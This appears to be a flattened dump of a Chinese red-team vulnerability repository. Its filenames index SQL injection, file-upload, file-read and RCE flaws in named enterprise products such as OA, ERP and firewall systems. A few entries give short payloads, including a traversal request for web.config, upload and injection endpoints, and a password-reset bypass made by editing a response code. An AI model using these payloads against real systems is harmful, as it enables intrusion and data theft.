https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md -------------------------------------------------------------------------------- /万户OA SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/万户OA SQL注入漏洞.md -------------------------------------------------------------------------------- /万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md -------------------------------------------------------------------------------- /万户ezoffice wpsservlet任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/万户ezoffice wpsservlet任意文件上传.md -------------------------------------------------------------------------------- /万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /九思-OA-任意文件上传.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /jsoa/wpsforlinux/src/upload_l.jsp?openType= 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /云时空商业ERP文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/云时空商业ERP文件上传.md -------------------------------------------------------------------------------- /云课网校系统uploadImage存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/云课网校系统uploadImage存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md -------------------------------------------------------------------------------- /亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md -------------------------------------------------------------------------------- /任我行协同CRM反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/任我行协同CRM反序列化漏洞.md -------------------------------------------------------------------------------- /全息AI网络运维平台存在命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/全息AI网络运维平台存在命令执行漏洞.md -------------------------------------------------------------------------------- /创客13星零售商城系统RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/创客13星零售商城系统RCE.md -------------------------------------------------------------------------------- /创客13星零售商城系统前台任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/创客13星零售商城系统前台任意文件上传漏洞.md -------------------------------------------------------------------------------- /北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md -------------------------------------------------------------------------------- /华天动力-OA-downloadWpsFile任意文件读取.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/华天动力-OA-downloadWpsFile任意文件读取.md -------------------------------------------------------------------------------- /华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md -------------------------------------------------------------------------------- /华磊科技物流modifyInsurance sql注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/华磊科技物流modifyInsurance sql注入漏洞.md -------------------------------------------------------------------------------- /同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md -------------------------------------------------------------------------------- /启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md -------------------------------------------------------------------------------- /启明星辰-天清汉马VPN接口download任意文件读取.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/启明星辰-天清汉马VPN接口download任意文件读取.md -------------------------------------------------------------------------------- /喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md -------------------------------------------------------------------------------- /喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md -------------------------------------------------------------------------------- /喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md -------------------------------------------------------------------------------- /喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md -------------------------------------------------------------------------------- /因酷教育平台RCE(CVE-2024-35570).md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/因酷教育平台RCE(CVE-2024-35570).md -------------------------------------------------------------------------------- /天玥网络安全审计系统 SQL 注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/天玥网络安全审计系统 SQL 注入漏洞.md -------------------------------------------------------------------------------- /天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md -------------------------------------------------------------------------------- /天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /好视通视频会议系统存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/好视通视频会议系统存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /安恒-下一代防火墙-RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/安恒-下一代防火墙-RCE.md -------------------------------------------------------------------------------- /安恒明御安全网关rce.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/安恒明御安全网关rce.md -------------------------------------------------------------------------------- /安恒明御安全网关远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/安恒明御安全网关远程命令执行漏洞.md -------------------------------------------------------------------------------- /宏景eHR sdutygetSdutyTree SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/宏景eHR sdutygetSdutyTree SQL注入.md -------------------------------------------------------------------------------- /宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md -------------------------------------------------------------------------------- /宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md -------------------------------------------------------------------------------- /宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md -------------------------------------------------------------------------------- /小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png -------------------------------------------------------------------------------- /小学智慧校园信息管理系统 Upload 文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/小学智慧校园信息管理系统 Upload 文件上传漏洞.md -------------------------------------------------------------------------------- /山石网科云鉴存在前台任意命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/山石网科云鉴存在前台任意命令执行漏洞.md -------------------------------------------------------------------------------- /帆软FineReport报表 ReportServer SQL注入getshell.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/帆软FineReport报表 ReportServer SQL注入getshell.md -------------------------------------------------------------------------------- /帆软报表 channel 远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/帆软报表 channel 远程命令执行漏洞.md -------------------------------------------------------------------------------- /帆软未授权命令执行.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/帆软未授权命令执行.md -------------------------------------------------------------------------------- /广州图创-图书馆集群管理系统-PermissionAC.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/广州图创-图书馆集群管理系统-PermissionAC.md -------------------------------------------------------------------------------- /广联达-Linkworks-GetAllData接口存在未授权访问.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/广联达-Linkworks-GetAllData接口存在未授权访问.md -------------------------------------------------------------------------------- /广联达Linkworks ArchiveWebService XML实体注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/广联达Linkworks ArchiveWebService XML实体注入漏洞.md -------------------------------------------------------------------------------- /广联达OA接口ArchiveWebService存在XML实体注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md -------------------------------------------------------------------------------- /建文工程管理系统 download2 文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/建文工程管理系统 download2 文件读取漏洞.md -------------------------------------------------------------------------------- /建文工程管理系统desktop.ashx存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/建文工程管理系统desktop.ashx存在SQL注入漏洞.md -------------------------------------------------------------------------------- /建文工程项目管理软件BusinessManger存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/建文工程项目管理软件BusinessManger存在SQL注入漏洞.md -------------------------------------------------------------------------------- /微信公众平台-无限回调系统-SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/微信公众平台-无限回调系统-SQL注入.md -------------------------------------------------------------------------------- /拓尔思-TRSWAS5.0-PermissionAC文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/拓尔思-TRSWAS5.0-PermissionAC文件上传.md -------------------------------------------------------------------------------- /拓尔思TRS媒资管理系统任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/拓尔思TRS媒资管理系统任意文件上传.md -------------------------------------------------------------------------------- /指尖云平台-智慧政务payslip SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/指尖云平台-智慧政务payslip SQL注入漏洞.md -------------------------------------------------------------------------------- /捷诚管理信息系统 SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/捷诚管理信息系统 SQL注入漏洞.md -------------------------------------------------------------------------------- /数字通云平台智慧政务 time SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/数字通云平台智慧政务 time SQL注入漏洞.md -------------------------------------------------------------------------------- /数字通指尖云平台-智慧政务payslip SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/数字通指尖云平台-智慧政务payslip SQL注入漏洞.md -------------------------------------------------------------------------------- /方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md -------------------------------------------------------------------------------- /方天云智慧平台系统文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/方天云智慧平台系统文件上传.md -------------------------------------------------------------------------------- /明源云ERP接口ApiUpdate.ashx文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/明源云ERP接口ApiUpdate.ashx文件上传漏洞.md -------------------------------------------------------------------------------- /易宝OA ExecuteSqlForSingle SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/易宝OA ExecuteSqlForSingle SQL注入漏洞.md -------------------------------------------------------------------------------- /易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png -------------------------------------------------------------------------------- /易宝OA 存在BasicService存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/易宝OA 存在BasicService存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 重置密码处,改回包中的code字段为1 3 | ``` 4 | 5 | -------------------------------------------------------------------------------- /汇智ERP filehandle.aspx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/汇智ERP filehandle.aspx 任意文件读取漏洞.md -------------------------------------------------------------------------------- /泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md -------------------------------------------------------------------------------- /泛微E-Mobile installOperate.do SSRF漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微E-Mobile installOperate.do SSRF漏洞.md -------------------------------------------------------------------------------- /泛微E-cology9 browserjsp SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微E-cology9 browserjsp SQL注入漏洞.md -------------------------------------------------------------------------------- /泛微E-office-10接口leave_record.php SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微E-office-10接口leave_record.php SQL注入漏洞.md -------------------------------------------------------------------------------- /泛微HrmService存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微HrmService存在SQL注入漏洞.md -------------------------------------------------------------------------------- /泛微OA E-Cology存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微OA E-Cology存在SQL注入漏洞.md -------------------------------------------------------------------------------- /泛微OA E-Office V10 OfficeServer 任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微OA E-Office V10 OfficeServer 任意文件上传.md -------------------------------------------------------------------------------- /泛微e-cology9 存在SSRF漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微e-cology9 存在SSRF漏洞.md -------------------------------------------------------------------------------- /泛微ecology系统setup接口存在信息泄露漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微ecology系统setup接口存在信息泄露漏洞.md -------------------------------------------------------------------------------- /泛微云桥文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/泛微云桥文件上传.md -------------------------------------------------------------------------------- /浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc2.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc2.md -------------------------------------------------------------------------------- /浪潮云财务系统 bizintegrationwebservice.asmx 命令执行.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/浪潮云财务系统 bizintegrationwebservice.asmx 命令执行.md -------------------------------------------------------------------------------- /浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md -------------------------------------------------------------------------------- /海康卫视综合安防 uploadAllPackage任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/海康卫视综合安防 uploadAllPackage任意文件上传.md -------------------------------------------------------------------------------- /海康威视教育综合安防管理系统admintoken泄露.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/海康威视教育综合安防管理系统admintoken泄露.md -------------------------------------------------------------------------------- /海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md -------------------------------------------------------------------------------- /海康威视综合安防管理平台前台RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/海康威视综合安防管理平台前台RCE.md -------------------------------------------------------------------------------- /海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md -------------------------------------------------------------------------------- /润乾报表InputServlet存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/润乾报表InputServlet存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /润乾报表dataSphereServlet 任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/润乾报表dataSphereServlet 任意文件上传漏洞.md -------------------------------------------------------------------------------- /润乾报表dataSphereServlet接口 任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/润乾报表dataSphereServlet接口 任意文件读取漏洞.md -------------------------------------------------------------------------------- /深信服-下一代防火墙-RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/深信服-下一代防火墙-RCE.md -------------------------------------------------------------------------------- /深信服下一代防火墙NGAF存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/深信服下一代防火墙NGAF存在任意文件上传漏洞.md -------------------------------------------------------------------------------- /深澜计费管理系统strategy存在反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/深澜计费管理系统strategy存在反序列化漏洞.md -------------------------------------------------------------------------------- /湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md -------------------------------------------------------------------------------- /满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md -------------------------------------------------------------------------------- /猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md -------------------------------------------------------------------------------- /瑞斯康达-多业务智能网关-RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/瑞斯康达-多业务智能网关-RCE.md -------------------------------------------------------------------------------- /瑞斯康达多业务智能网关RCE.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/瑞斯康达多业务智能网关RCE.md -------------------------------------------------------------------------------- /甄云 SRM 云平台 SpEL 表达式注入漏洞.md: -------------------------------------------------------------------------------- 1 | /oauth/public/SpEL表达式/ab?username=bHM= -------------------------------------------------------------------------------- /用友 NC Cloud jsinvoke 任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友 NC Cloud jsinvoke 任意文件上传.md -------------------------------------------------------------------------------- /用友 U8 cloud MonitorServlet 反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友 U8 cloud MonitorServlet 反序列化漏洞.md -------------------------------------------------------------------------------- /用友 UAP querygoodsgridbycode SQL 注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友 UAP querygoodsgridbycode SQL 注入.md -------------------------------------------------------------------------------- /用友-CRM客户关系管理系统-任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友-CRM客户关系管理系统-任意文件上传.md -------------------------------------------------------------------------------- /用友-U8-Cloud-文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友-U8-Cloud-文件上传.md -------------------------------------------------------------------------------- /用友-畅捷通CRM-任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友-畅捷通CRM-任意文件上传.md -------------------------------------------------------------------------------- /用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md -------------------------------------------------------------------------------- /用友NC Cloud queryStaffByName SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友NC Cloud queryStaffByName SQL注入漏洞.md -------------------------------------------------------------------------------- /用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md -------------------------------------------------------------------------------- /用友NC-UserAuthenticationServlet存在反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友NC-UserAuthenticationServlet存在反序列化漏洞.md -------------------------------------------------------------------------------- /用友NC任意文件读取.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友NC任意文件读取.md -------------------------------------------------------------------------------- /用友NC及U8cloud LoggingConfigServlet 反序列化漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友NC及U8cloud LoggingConfigServlet 反序列化漏洞.md -------------------------------------------------------------------------------- /用友U8 CRM import.php 文件上传漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U8 CRM import.php 文件上传漏洞.md -------------------------------------------------------------------------------- /用友U8 Cloud ActionServlet SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U8 Cloud ActionServlet SQL注入漏洞.md -------------------------------------------------------------------------------- /用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md -------------------------------------------------------------------------------- /用友U8 Cloud linkntb存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U8 Cloud linkntb存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友U9-UMWebService.asmx存在文件读取漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U9-UMWebService.asmx存在文件读取漏洞.md -------------------------------------------------------------------------------- /用友U9系统DoQuery接口存在SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友U9系统DoQuery接口存在SQL注入.md -------------------------------------------------------------------------------- /用友u8-cloud RegisterServlet SQL注入.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友u8-cloud RegisterServlet SQL注入.md -------------------------------------------------------------------------------- /用友时空KSOA PreviewKPQT SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA PreviewKPQT SQL注入漏洞.md -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md -------------------------------------------------------------------------------- /用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md -------------------------------------------------------------------------------- /电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png -------------------------------------------------------------------------------- /电信网关 ipping.php 命令执行漏洞.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/电信网关 ipping.php 命令执行漏洞.md -------------------------------------------------------------------------------- /百易云资产管理运营系统任意文件上传.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/百易云资产管理运营系统任意文件上传.md -------------------------------------------------------------------------------- /禅道研发项⽬管理系统未授权.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/禅道研发项⽬管理系统未授权.md -------------------------------------------------------------------------------- /福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md: 